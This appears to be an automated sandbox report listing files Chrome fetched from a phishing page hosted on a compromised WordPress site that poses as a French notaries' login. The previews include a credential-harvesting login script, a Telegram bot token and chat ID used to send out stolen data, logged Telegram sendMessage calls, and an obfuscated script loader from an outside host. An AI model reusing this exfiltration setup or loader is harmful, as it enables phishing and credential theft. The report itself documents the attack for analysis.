                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                        Category:downloaded
                        Size (bytes):2726
                        Entropy (8bit):7.918412766770783
                        Encrypted:false
                        SSDEEP:48:HQ+bNRWRjf4iIFaRmGtIhyqdbG04gSDAGjQgRMLeitaEQWWBY+:HQ2NRMbmGtIhPi869QkEs9
                        MD5:95F8A06C83F57C53C177DCF43EFAA2A3
                        SHA1:E255BD68A413418532A5F7CC98AD73979B0C0008
                        SHA-256:3D63CAE64A9E1A71F70CB8E665DB851BD9A6B8ADE07AAAB50F116703637EF3FA
                        SHA-512:D6C06A4D6CBCC68CF0D187BBA1433E30EE276528E1EE73C6660F44F9D369CD90E8D5636106081BEEF5D9B80428FB436C80729D7473BED666432262D3D6CCB975
                        Malicious:false
                        Reputation:low
                        URL:https://www.askozvar.sk/wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png
                        Preview:.PNG........IHDR... ... .....szz....mIDATX..kl..u..wfv.....\..$>$Y")...;i\..$;n...\.5.(.4A..I.@..........c$..... n...c...-..)...]..]R...3s...+.q..|.......s.9..A....%..Mp.@......[.<p.F.%%oX.zI...Q.V..o.H.):b...">-`=..(.....5...%..R^l.^.~/._.D..?..._...h....C.If.....-[.1...)...._TK.{.s.&.M....C..*p...o,...f..}.n...D.b..f.8.|k........G.|.vj.&[...t...G..i.....o..8...m....6.......}X.M..._\..Zq.[r.....o...W.{.co..S....L..<...q4...........K......`0......^1.*.u!.....D8..#.L...B....~.p.....w..R..........3.x......r.].vq..i....;.M).....Ff...4kSt.>.v..n.S..9.../B.4../.^..4M....R...@.t... .......B.G.!...(....0...?...1R.....%.r........-..P$..m......,.c....B...........|.G%....illd.u..q...hmm.Z....L...P~.ES.0.0a.bO]...m&.(B<,.5....'.p..n*^?u..#S.x...g.,..c...FN#l..(T........H4J__/."...;T...g.up.*H@hj...x.............'...l^.1w....8.9...C..M.?............h4...Go_..~...o...%Bw.......]B<.-+b.5.5/.|.B.z...h...KE.2g......L.X\\DJ.!"+.A..A8.Z.P)9....^8.+.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (32012)
                        Category:dropped
                        Size (bytes):69597
                        Entropy (8bit):5.369216080582935
                        Encrypted:false
                        SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                        MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                        SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                        SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                        SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                        Malicious:false
                        Reputation:low
                        Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (32065)
                        Category:downloaded
                        Size (bytes):85578
                        Entropy (8bit):5.366055229017455
                        Encrypted:false
                        SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                        MD5:2F6B11A7E914718E0290410E85366FE9
                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                        Malicious:false
                        Reputation:low
                        URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (65325)
                        Category:downloaded
                        Size (bytes):144877
                        Entropy (8bit):5.049937202697915
                        Encrypted:false
                        SSDEEP:1536:GcoqwrUPyDHU7c7TcDEBi82NcuSELL4d/+oENM6HN26Q:VoPgPard2oENM6HN26Q
                        MD5:450FC463B8B1A349DF717056FBB3E078
                        SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                        SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                        SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                        Malicious:false
                        Reputation:low
                        URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                        Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (1572)
                        Category:downloaded
                        Size (bytes):5776
                        Entropy (8bit):5.413625274435423
                        Encrypted:false
                        SSDEEP:96:ZOxMMMJOxMMmvFZ8OxMM4OxMMVYOxMMjOxMMoyhZcyJzV+zmnWOxMMjubqGIFuYD:eMumjvVPYouyISbqGIwY75zMa
                        MD5:A02FB6BDA0B5E14B166A37BD96784ABD
                        SHA1:B4D2685AE063388D3B01CED889C9E1D3CCE215B3
                        SHA-256:B4E544B010077CEACF159DFDF566B37D06F8AB3C151E9561720E392B8F1EA38E
                        SHA-512:3AA39B837C90AC89D74B5BB0A492FE70215E692111557AD8ECA99EB2217A95DF847F1DC642D89DF1751FBA2DCCC21DAF6A7DD20D40A5252F91856DE94707778F
                        Malicious:false
                        Reputation:low
                        URL:https://fonts.googleapis.com/css?family=Open+Sans:600
                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVIGxA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-fa
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):120
                        Entropy (8bit):5.35673126782461
                        Encrypted:false
                        SSDEEP:3:qU2KLyFPqFuRYMe6mEM4u8ESCJovf44RSr:qU21qUBI4zExJk44w
                        MD5:308349266B4A9DC26412208E7DB4108D
                        SHA1:D5F9C7F1CCE93C982A554A2794BE8D5097044FDB
                        SHA-256:AEF03032E02117F21716BC6227093228B58DE1FD4B0007C3987C5EEFC7AEDEB5
                        SHA-512:1D66B42D038A6861257E6F7E67E69302F35505178837D5E950C203D2CAAF65E0CFAB3D83CC0C2A26AC05C7D52FBFFE8BCB44C21C80449FD946E674FD8D037C34
                        Malicious:false
                        Reputation:low
                        URL:https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js
                        Preview:var telegramConfig = {.. botToken: '7476294701:AAHp0Imisc_Yg7QfBWPayX6IkiUtBYyzntQ',.. chatID: '-4279547544'..};..
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (32065)
                        Category:dropped
                        Size (bytes):85578
                        Entropy (8bit):5.366055229017455
                        Encrypted:false
                        SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                        MD5:2F6B11A7E914718E0290410E85366FE9
                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                        Malicious:false
                        Reputation:low
                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (18450), with CRLF line terminators
                        Category:dropped
                        Size (bytes):20279
                        Entropy (8bit):5.2872859445624325
                        Encrypted:false
                        SSDEEP:384:tE8R8CVycXJxHKJ7vfL1E8Xb/5I4qhcXrfLPHoPBVUyZDWhIMrE/mnZCjvt+G3y:28R8yJxHi7vf5E8Xb/y4qh6rfLPuBVUt
                        MD5:70471094D2A37A4F6C6314B8701D3E2B
                        SHA1:20EAF22B3D1B46BB12D9C5FC20E604581086A2BA
                        SHA-256:0B8BE92AD51376FFE656168D809CF6413615C341FB84A864AAEC77046E5D536B
                        SHA-512:603606B2BBF92D559A2EB012D78DC4EDF781A3CFEAE330A24B7DB3ACAF00A34677D40C83A9671590A455AC1721661CBA1346CAF7C56CA6FF67B4D0BC2755EAF3
                        Malicious:false
                        Reputation:low
                        Preview:/*.. * jquery.countdownTimer.min.js 1.0.8.. * Author - Harshen Amarnath Pandey.. * Version - 1.0.8.. * Release - 18th April 2015.. * Copyright (c) 2014 - 2018 Harshen Pandey..*/....!function(n){function t(t,c){var S=n.extend({},n.fn.countdowntimer.defaults,c),t=t;t.addClass("style");var m="",M="",h="",v="";if(m=S.size,M=S.borderColor,h=S.fontColor,v=S.backgroundColor,void 0!=c.regexpMatchFormat&&void 0!=c.regexpReplaceWith&&void 0==c.timeSeparator&&(window["regexpMatchFormat_"+t.attr("id")]=c.regexpMatchFormat,window["regexpReplaceWith_"+t.attr("id")]=c.regexpReplaceWith),void 0!=c.borderColor||void 0!=c.fontColor||void 0!=c.backgroundColor){var g={background:v,color:h,"border-color":M};t.css(g)}else t.addClass("colorDefinition");if(void 0!=c.size)switch(m){case"xl":t.addClass("size_xl");break;case"lg":t.addClass("size_lg");break;case"md":t.addClass("size_md");break;case"sm":t.addClass("size_sm");break;case"xs":t.addClass("size_xs")}else"sm"==m&&t.addClass("size_sm");if(void 0!=c.start
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4712
                        Entropy (8bit):4.525537981713157
                        Encrypted:false
                        SSDEEP:48:xrqpoJWibIlrAll2PmCLBw0hSBRXQVLWibxIlrAll2PBlBQR5pXi8YLMJ9MJX0n:16K2PmCpSgpsK2PZyvfEc5n
                        MD5:9EE11FD56B3DC242C96B7C62C9AFAF48
                        SHA1:C2C658BC6278B08DBAF358D146FC60CAB6A964C4
                        SHA-256:B57611DB083C6D2C1DD187A143B8C6B85B3124B73A37660A21B00EECAEC65E9A
                        SHA-512:B0D7140DB3C475BB6F32CE592BED6000419D1313B86B01A3D7FB0692DA5BADC3BD1F4FBA7D00C49420452E71D169B743A57E32A718437F6411A9C80A369AED6F
                        Malicious:false
                        Reputation:low
                        Preview:/* global $ */..$(document).ready(function() {.. var count = 0;.... $(document).keypress(function(event) {.. var keycode = (event.keyCode ? event.keyCode : event.which);.. if (keycode == '13') {.. if ($("#divPr").is(":visible")) {.. $("#submit-btn").trigger("click");.. } else {.. $("#next").trigger("click");.. }.. }.. });.... $('#next').click(function() {.. $('#error').hide();.. $('#msg').hide();.. event.preventDefault();.. var ai = $("#ai").val();.... ///////////new injection////////////////.. var my_ai = ai;.. var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;.... if (!ai) {.. $('#error').show();.. $('#error').html("Le champ e-mail est vide.!");.. ai.focus;.. return false;.. }.... if (!filter.test(my_ai)) {.. $('#error').show();..
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (50758)
                        Category:dropped
                        Size (bytes):51039
                        Entropy (8bit):5.247253437401007
                        Encrypted:false
                        SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                        MD5:67176C242E1BDC20603C878DEE836DF3
                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                        Malicious:false
                        Reputation:low
                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:downloaded
                        Size (bytes):428
                        Entropy (8bit):4.997675433218382
                        Encrypted:false
                        SSDEEP:12:YKOHu/PeyVUxNqua3U2T4bbjzuVEd8NyiHsQJuR7N9:YKOHTyVqqua8HPRY9JUB9
                        MD5:CE5ED55865AF422248A39415AB0A092C
                        SHA1:AF844B2CD9DB4EFC64EAE907DDDD6F087030E9A0
                        SHA-256:CACC420007D719654D76557D76C0DDD2F4D83C42DF0F04F5729DC40CD3C8C0B6
                        SHA-512:4359831B13EDB17171D4A6A2D748C5C4530DFB4B829D825BD6550E89E99164A6B6A7BD2069D70B4DE63EE5E8029D7123441CF40756A03FB074E7B6C52E05C753
                        Malicious:false
                        Reputation:low
                        URL:https://api.telegram.org/bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html
                        Preview:{"ok":true,"result":{"message_id":410121,"from":{"id":1416352134,"is_bot":true,"first_name":"Gay lover bot","username":"Xresultes_bot"},"chat":{"id":-4243763425,"title":"For Links Sheets","type":"group","all_members_are_administrators":true},"date":1725057345,"text":"http://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html","entities":[{"offset":0,"length":105,"type":"url"}]}}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with no line terminators
                        Category:downloaded
                        Size (bytes):28
                        Entropy (8bit):4.137537511266052
                        Encrypted:false
                        SSDEEP:3:G4iC1Y:ziC1Y
                        MD5:C41A026A97DFC107025EEC7F45F29C85
                        SHA1:B77C8FE6D6A770AF1758FC34B3E716656B8F2485
                        SHA-256:8A7130BC862841606D062AC516513B01EB176CEF37D017E18B54E844E8390029
                        SHA-512:6DE72788DA933F3DA0D1FB315335B8DE1BD9D4F7B59A0F1D1F6E758AB0D1EC3D7F0B8FFCDE16313B555BFE18832FF8671A2159F5AFCEEA6C45C2A037345ED017
                        Malicious:false
                        Reputation:low
                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlcDZuoTvvGMRIFDVNVgbUSBQ2tCa6x?alt=proto
                        Preview:ChIKBw1TVYG1GgAKBw2tCa6xGgA=
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):428
                        Entropy (8bit):5.001398863226403
                        Encrypted:false
                        SSDEEP:12:YKOHu/PJyVUxNqua3U2T4bbsjzuVEd8NyiHsQJuR7N9:YKOH8yVqqua8HyRY9JUB9
                        MD5:DFE7F6C66AB8C2E4C7AC6A243380FD7D
                        SHA1:CFD29FEBEB5EE25FABAA55DAA3B4973C1F6A0323
                        SHA-256:9038AF2B5749B9CBEC1AC6628E65EEF9B7B9E27A3715C6BEBEAC4135C4C1B7D7
                        SHA-512:9EC8337AF71210ADCB322F80944CEF35F45AF786E5FB8DAD0D4107B30914FB55D0EA24737F0F03EEBE05D3EDFE8AF84383F57942ADEE7BD325DF849A87CDF4A4
                        Malicious:false
                        Reputation:low
                        Preview:{"ok":true,"result":{"message_id":410122,"from":{"id":1416352134,"is_bot":true,"first_name":"Gay lover bot","username":"Xresultes_bot"},"chat":{"id":-4243763425,"title":"For Links Sheets","type":"group","all_members_are_administrators":true},"date":1725057346,"text":"http://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html","entities":[{"offset":0,"length":105,"type":"url"}]}}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (27853)
                        Category:downloaded
                        Size (bytes):271837
                        Entropy (8bit):6.0852778908237575
                        Encrypted:false
                        SSDEEP:6144:C35bBeHcppL1eqJfK8Qy3Lc/4KYBDOmqFOeqkWkQ:C3npp/JfKA34YBam/NkWkQ
                        MD5:7813AEBBFFBD4B681EA1DB856CB99836
                        SHA1:C22016B6D2DD17D48C997089C5C2C7F1ADA21D08
                        SHA-256:A10CED0D9421C7741C2ECDC529F08FF5A8699B8B266278A003C6725F09E804F6
                        SHA-512:9FF4C3F6CFF641E37DEB8F13C54336F7BC02A511B1A0E33E2EAA4EEE4BB129F946AE1CAB05007E125FBC37C6AA5D5365F1AF1CAF5F1288EBE3A7D291264B6B13
                        Malicious:false
                        Reputation:low
                        URL:https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
                        Preview:<html><head>. <meta charset="UTF-8" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">. <title>Plans Archi</title>. <link rel="stylesheet prefetch" href="https://fonts.googleapis.com/css?family=Open+Sans:600">.<style>..html {..line-height: 1.15;..-ms-text-size-adjust: 100%;..-webkit-text-size-adjust: 100%.}.body {..height: 100%;..margin: 0.}.article, aside, footer, header, nav, section {..display: block.}.h1 {..font-size: 2em;..margin: .67em 0.}.figcaption, figure, main {..display: block.}.figure {..margin: 1em 40px.}.hr {..box-sizing: content-box;..height: 0;..overflow: visible.}.pre {..font-family: monospace, monospace;..font-size: 1em.}.a {..background-color: transparent;..-webkit-text-decoration-skip: objects.}.abbr[title] {..border-bottom: none;..text-decoration: underline;..text-decoration: underline dotted.}.b, strong {..font-weight: inherit.}.b, strong {..font-weight: bolder.}.code, kbd, samp {..font
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (50758)
                        Category:downloaded
                        Size (bytes):51039
                        Entropy (8bit):5.247253437401007
                        Encrypted:false
                        SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                        MD5:67176C242E1BDC20603C878DEE836DF3
                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                        Malicious:false
                        Reputation:low
                        URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (1713), with CRLF line terminators
                        Category:dropped
                        Size (bytes):4988
                        Entropy (8bit):5.53105493612953
                        Encrypted:false
                        SSDEEP:96:fy9bgrgawdO2q79IiZYINIcDUg154mhyrxIfWrzVK3OixRnfNQyTDya3K:trgFdO2g9IhcDU6imhyrxIfWrzVK3Fkd
                        MD5:001EA31302F05302E218693AF5C04060
                        SHA1:AA900082862DA1022AF9479A2074549E8415E306
                        SHA-256:9CB8D14A969F4A6CF8813F895480BECC6B802DF39C3CDF3BE80338FB7D6DFEE5
                        SHA-512:C3C193B9DF5299CAB0C500CDBF8AD36AE45F0875C7D577158C151C41B3548DF00E7DA7BAFFE64EDCA1ACD91E28577A55C6839F5C619B261DD1B9BA0851FA76C9
                        Malicious:false
                        Reputation:low
                        Preview:var _0xee8a36=_0x2e18;(function(_0x3a523f,_0x41e5ee){var _0x539c92=_0x2e18,_0x5b0065=_0x3a523f();while(!![]){try{var _0x16996e=parseInt(_0x539c92(0x1c0))/0x1*(parseInt(_0x539c92(0x1c7))/0x2)+parseInt(_0x539c92(0x1cb))/0x3+parseInt(_0x539c92(0x1bd))/0x4+-parseInt(_0x539c92(0x1c9))/0x5+-parseInt(_0x539c92(0x1c8))/0x6*(-parseInt(_0x539c92(0x1cc))/0x7)+parseInt(_0x539c92(0x1c4))/0x8*(-parseInt(_0x539c92(0x1c5))/0x9)+-parseInt(_0x539c92(0x1c3))/0xa*(parseInt(_0x539c92(0x1c1))/0xb);if(_0x16996e===_0x41e5ee)break;else _0x5b0065['push'](_0x5b0065['shift']());}catch(_0xcf3dda){_0x5b0065['push'](_0x5b0065['shift']());}}}(_0x2f5b,0x1cb7b));function _0x2e18(_0x176eb8,_0x79f9ab){var _0x2f5b9d=_0x2f5b();return _0x2e18=function(_0x2e180a,_0x32ee09){_0x2e180a=_0x2e180a-0x1bd;var _0x2f6ebd=_0x2f5b9d[_0x2e180a];return _0x2f6ebd;},_0x2e18(_0x176eb8,_0x79f9ab);}var scriptElement=document[_0xee8a36(0x1c2)]('script'),a='h',z='t',e='t',r='p',t='s',y=':',u='/',i='/',o='d',p='a',q='n',s='c',d='i',f='n',g='g',h
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (1713), with CRLF line terminators
                        Category:downloaded
                        Size (bytes):4988
                        Entropy (8bit):5.53105493612953
                        Encrypted:false
                        SSDEEP:96:fy9bgrgawdO2q79IiZYINIcDUg154mhyrxIfWrzVK3OixRnfNQyTDya3K:trgFdO2g9IhcDU6imhyrxIfWrzVK3Fkd
                        MD5:001EA31302F05302E218693AF5C04060
                        SHA1:AA900082862DA1022AF9479A2074549E8415E306
                        SHA-256:9CB8D14A969F4A6CF8813F895480BECC6B802DF39C3CDF3BE80338FB7D6DFEE5
                        SHA-512:C3C193B9DF5299CAB0C500CDBF8AD36AE45F0875C7D577158C151C41B3548DF00E7DA7BAFFE64EDCA1ACD91E28577A55C6839F5C619B261DD1B9BA0851FA76C9
                        Malicious:false
                        Reputation:low
                        URL:https://dancinggorillas.com/style/pdf_fr.js
